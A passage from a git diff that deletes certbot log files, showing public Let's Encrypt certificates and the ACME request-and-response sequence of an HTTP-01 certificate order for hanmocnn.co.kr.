-MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E -AjAAMB0GA1UdDgQWBBRaL2bTWA0MjQBBBgZygk0nxCro8jAfBgNVHSMEGDAWgBSu -SJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG -Fmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u -LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0 -dHA6Ly9lNy5jLmxlbmNyLm9yZy8yNy5jcmwwggEFBgorBgEEAdZ5AgQCBIH2BIHz -APEAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxe/1qdAAAE -AwBIMEYCIQDwNplXasmzKSLIez7kR/jYwBmY+92fo0Oe9xTRW/LYwQIhALQ+kEkk -pUvSpkEcvMoHJVABdfGiHZZbWkgt7CSOPBySAHYAFoMtq/CpJQ8P8DqlRf/Iv8gj -0IdL9gQpJ/jnHzMT9foAAAGcXv9irwAABAMARzBFAiBKJHYXSD4GUqumXq5TLt3A -HS9ZM08kl/NzaSz0eNoTAgIhAMldLvgzn+UR9VyLT3n2KT6n82wIo035yLwnogk5 -KY/lMAoGCCqGSM49BAMDA2gAMGUCMQDBWHS4t+nwA0lkvbQcsUqQq3uabapszHs1 -ZVOVAO4J+Vfx3wgTRO8Dx8F33rBWndYCMGC0CN463ukm+NgQt/ByckZ2/rxaUm9S -AhNC3oI5CvlMIrXyWD67+cCSiTNiQIuD7A== ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL -MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo -IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN -MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j -cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ -vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF -HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw -DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS -BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA -gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm -MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww -CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu -b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX -lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb -Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf ------END CERTIFICATE----- - -2026-02-15 01:52:02,884:DEBUG:acme.client:Storing nonce: NeKnt8TGzFhXu6tguKanBavnkUUb9vcvolh2BEjWZPFJHUOKePA -2026-02-15 01:52:02,885:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager -2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-6. -2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-6. -2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-6/cert.pem. -2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-6/privkey.pem. -2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-6/chain.pem. -2026-02-15 01:52:02,901:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-6/fullchain.pem. -2026-02-15 01:52:02,901:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-6/README. -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). -2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). -2026-02-15 01:52:02,913:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-15 01:52:02,913:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-15 01:52:02,913:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). -2026-02-15 01:52:02,913:DEBUG:certbot.configuration:Var webroot_map={'git.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user). -2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: -Successfully received certificate. -Certificate is saved at: /etc/letsencrypt/live/npm-6/fullchain.pem -Key is saved at: /etc/letsencrypt/live/npm-6/privkey.pem -This certificate expires on 2026-05-16. -These files will be updated when the certificate renews. -2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: -2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. -2026-02-15 01:52:02,919:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: - * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate - * Donating to EFF: https://eff.org/donate-le diff --git a/npm/data/logs/letsencrypt.log.2 b/npm/data/logs/letsencrypt.log.2 deleted file mode 100644 index a79f241..0000000 --- a/npm/data/logs/letsencrypt.log.2 +++ /dev/null @@ -1,629 +0,0 @@ -2026-02-14 23:56:03,849:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-5', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'hanmocnn.co.kr,www.hanmocnn.co.kr'] -2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-14 23:56:03,865:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-14 23:56:03,866:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 23:56:03,866:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-14 23:56:03,867:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-14 23:56:03,867:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-14 23:56:04,100:DEBUG:certbot._internal.main:Picked account: -2026-02-14 23:56:04,101:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-14 23:56:04,106:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-14 23:56:04,633:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-14 23:56:04,634:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:04 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "Gc3gBymDyPY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-14 23:56:04,635:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for hanmocnn.co.kr and www.hanmocnn.co.kr -2026-02-14 23:56:04,655:DEBUG:acme.client:Requesting fresh nonce -2026-02-14 23:56:04,655:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-14 23:56:04,815:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-14 23:56:04,816:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:04 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGestOb4Fc1JYyinutgiAntZDFY_yp1ktjxi2tcT3bfYw -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-14 23:56:04,816:DEBUG:acme.client:Storing nonce: NeKnt8TGestOb4Fc1JYyinutgiAntZDFY_yp1ktjxi2tcT3bfYw -2026-02-14 23:56:04,817:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "hanmocnn.co.kr"\n },\n {\n "type": "dns",\n "value": "www.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-14 23:56:04,823:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2VzdE9iNEZjMUpZeWludXRnaUFudFpERllfeXAxa3RqeGkydGNUM2JmWXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "juewpbMaBZNaMfU9dqjamSNFoI-PzgktmhJyw43wSZ5OThiGI7N6iTuEJBKZ8hLFW6fcOzQP3cToFaJrtCwOKxu7KXy1k3wCleq6z99OtmHXACZHsaPrPZ-mXMicz8e1vS-6h1oR2zg94g-gHelbWesHEb6M60Rn8EjK4DFm8SvIaFwBquEsLFRrekm0fwYNqohUGgTCL7abdUes9Yw_6siofGMzU0fMcXRA_s114rGwFAPQ-6jqqWNwlYVgBGY--3BEl3OwwZ0-pQOSnc7t8_rU5e6JZr_hDSU_0zogGuAsuy644cQMsa-_nSx92ZTmPX_XzRxS7YGDBajbXMi_Ow", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImhhbm1vY25uLmNvLmtyIgogICAgfSwKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInd3dy5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0" -} -2026-02-14 23:56:05,027:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 497 -2026-02-14 23:56:05,028:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:04 GMT -Content-Type: application/json -Content-Length: 497 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480375535806 -Replay-Nonce: 4AH-2vvBT2vTYIMOrxGiTtOKUqEylQbuZuNcckoFVLrqiF3jx9Y -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "pending", - "expires": "2026-02-21T23:56:04Z", - "identifiers": [ - { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - { - "type": "dns", - "value": "www.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386", - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480375535806" -} -2026-02-14 23:56:05,028:DEBUG:acme.client:Storing nonce: 4AH-2vvBT2vTYIMOrxGiTtOKUqEylQbuZuNcckoFVLrqiF3jx9Y -2026-02-14 23:56:05,028:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:05,033:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QlQydlRZSU1PcnhHaVR0T0tVcUV5bFFidVp1TmNja29GVkxycWlGM2p4OVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0", - "signature": "pbWBe85DpxKfn_lPIjFwvF1jfmQ4abuYD0ndP5kNoZ5TLTUhA31C3vEuxlsovLJgyC8Ulmm7Bgx4WeyEMT6qjtxhy9j5Kykk-7wRszhAuRdyz-lsifs8J9-yxoE3C9IkglmljKeTmW_ApNEwwjaT2byaaET9vIIJsabfromIWewPAYdSfzbqDPlEk3nZyH9rtfOFhz8Rj3-v0OjT_asvc8pwOrVjGO3gOtLQG4K0eZHiE555xsZvZB__-F9hPs0ZYFPlglrDTqw5XKJQo7ufYSZainTqGIGWUX-jVz1WgQRstGfQr6VwhH0oc1EekFl95l_MtKq18gcmO_D6BJpLdQ", - "payload": "" -} -2026-02-14 23:56:05,197:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777 -2026-02-14 23:56:05,198:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:05 GMT -Content-Type: application/json -Content-Length: 777 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvBHbnqIb9LyBaA8P9msdY-ehXuVEPrNk20KbauKrGshqo -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "www.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-16T22:37:07Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "valid", - "validated": "2026-02-14T22:37:00Z", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo", - "validationRecord": [ - { - "url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo", - "hostname": "www.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-14 23:56:05,198:DEBUG:acme.client:Storing nonce: 4AH-2vvBHbnqIb9LyBaA8P9msdY-ehXuVEPrNk20KbauKrGshqo -2026-02-14 23:56:05,198:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:05,203:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkhibnFJYjlMeUJhQThQOW1zZFktZWhYdVZFUHJOazIwS2JhdUtyR3NocW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0", - "signature": "tz2Y086S4EaArR69HbUgLQD_29PSdN1N-KFP_-oLruFKzk-JHDDAYfdH-AhNXZY_hJFO-aW3WedTTy2ZCbIY6193cKJZuK0iNdJPPRRRhXS4anYzhvVqZrtsgM963naPim51-HwmIE1jo2ESDQGYk-0sMk4AnLsDtUFqk_uO8iRIFPKfX2Hk7-rzb8-ctq01lnHQ_GGpAbftWCd8OCOsaKmsDKe1AWAF3pMEi9Na7FnaNiQRO-JhDfj_HnAfJSP5B4oqh_ty71CP5OosPD1sb52-ROrEnHJWK5HCJt9t-1quhiKWFBfmBJ3FNCU4f8-aGyu7tdKxa6ta6ZEBk9HyUA", - "payload": "" -} -2026-02-14 23:56:05,367:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822 -2026-02-14 23:56:05,368:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:05 GMT -Content-Type: application/json -Content-Length: 822 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvBzHJaud8ZfhX0LUR1BTrdy4GJ8sNj5NkVg96bgxLtfuY -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:56:04Z", - "challenges": [ - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - } - ] -} -2026-02-14 23:56:05,368:DEBUG:acme.client:Storing nonce: 4AH-2vvBzHJaud8ZfhX0LUR1BTrdy4GJ8sNj5NkVg96bgxLtfuY -2026-02-14 23:56:05,368:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'} -2026-02-14 23:56:05,369:INFO:certbot._internal.auth_handler:Performing the following challenges: -2026-02-14 23:56:05,369:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='hanmocnn.co.kr') -2026-02-14 23:56:05,369:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. -2026-02-14 23:56:05,369:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge -2026-02-14 23:56:05,371:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0 -2026-02-14 23:56:05,372:DEBUG:acme.client:JWS payload: -b'{}' -2026-02-14 23:56:05,376:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QnpISmF1ZDhaZmhYMExVUjFCVHJkeTRHSjhzTmo1TmtWZzk2Ymd4THRmdVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2L1JNeEFBZyJ9", - "signature": "Ov4Fc1fM9a-2y12yEwh75oXuYp87xbKqQ_cGIG7P63r6MjbmmuLeZd5COLBfgrgjNJRgAOr1M32zNEdJWnZULT3cH-xGb6uipmCh3kN3Pdhqskbi4yUfkk16cI8zs9Lf5iPEK6PxhdBWxNA_-xY8zVqFVJTBGsliXxmGSGUJaRPWKFuZHutJRv66gHOJeLGcaVUbAbpOPGPRFh-0IsPc0yZqj-wN7BZwemY2b9x_WboVK7M2GeJwp8UAWDNzX0i7vwrOCYbqs8Eek4nNAd9xwpJUOCR8Y2dMRuZ9_KLJ92p7FlK1P5-dkOxMwpm4-Ss4UkYCTPsa37P8cptqoNeUaw", - "payload": "e30" -} -2026-02-14 23:56:05,542:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658791959956/RMxAAg HTTP/1.1" 200 195 -2026-02-14 23:56:05,543:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:05 GMT -Content-Type: application/json -Content-Length: 195 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="up" -Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg -Replay-Nonce: 4AH-2vvBjNLPyColdbElV57vl1FNhl30mNx5o-RvY8R6PJo2R68 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" -} -2026-02-14 23:56:05,543:DEBUG:acme.client:Storing nonce: 4AH-2vvBjNLPyColdbElV57vl1FNhl30mNx5o-RvY8R6PJo2R68 -2026-02-14 23:56:05,544:INFO:certbot._internal.auth_handler:Waiting for verification... -2026-02-14 23:56:06,544:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:06,549:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QmpOTFB5Q29sZGJFbFY1N3ZsMUZOaGwzMG1OeDVvLVJ2WThSNlBKbzJSNjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0", - "signature": "qN8X02M3qa1Ed8e8wWUDDn79drKvTl5NtGAiGpEmIIFEeuPoAmrppUeoo6UVjHoV2eIiYbI4tUTNIVbFYjffOkp9JlG5od3hSIix65LeFHPl7-9hg19zKFJiQma53yVbub7OFGeFqFj-IrXb8-5eiEy2mgxZ0aMznirCicV_zp_bLsH36z-E_bU1fFaNMPMTEwjqC8pudu87REDCqyTYepiezGO4rgjDda4Ddcb2zF2WpmAEasSSUx1cTwgmzs4kTT6RZFedefRw730Ecri9vwGi7QuvHHvZ_HywdGejwcMQ8bRDxSBssJXJJOsw5AHfkktnbIR3UtZ-sbBOT9_A3g", - "payload": "" -} -2026-02-14 23:56:06,724:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777 -2026-02-14 23:56:06,725:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:06 GMT -Content-Type: application/json -Content-Length: 777 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TG1OrA2e5G5sPzCyRvfzoUiUWFZAniIMDJOqe2pcuVeR0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "www.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-16T22:37:07Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw", - "status": "valid", - "validated": "2026-02-14T22:37:00Z", - "token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo", - "validationRecord": [ - { - "url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo", - "hostname": "www.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-14 23:56:06,725:DEBUG:acme.client:Storing nonce: NeKnt8TG1OrA2e5G5sPzCyRvfzoUiUWFZAniIMDJOqe2pcuVeR0 -2026-02-14 23:56:06,726:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:06,730:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhURzFPckEyZTVHNXNQekN5UnZmem9VaVVXRlpBbmlJTURKT3FlMnBjdVZlUjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0", - "signature": "qt11UnIYlgfU1E5jyT6qBNkGSoLXiZdyHKs3sQXhWI9yG363SPzQ78zH0oElA6LJgJgAS0mhkfZZtfU1lTzBrHZ_XLx5S0q-KQ-GZmcl-BOwB42l1jR13Bg6kJXowtDsqGZpZ0qoHG3rKqAUUchFQpX3NAPIqs15598OlpOBRG17MP8cF6HZJMWZsPIh4GGUDReGFRQdRjKhbr0ep3dnyWDIBdLD0LIrOUAMd5absl4Jn9Vd4nolz50iaFpZ88HxjOOx_OmeCOQ4v3ycagZ8dJLSSvT_PBMLlbH3_pyPVrBG5rafoph9pxQ5YM3oNWRVMXxmJqU_qKrr3k7LEjifAg", - "payload": "" -} -2026-02-14 23:56:06,894:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822 -2026-02-14 23:56:06,895:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:06 GMT -Content-Type: application/json -Content-Length: 822 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: 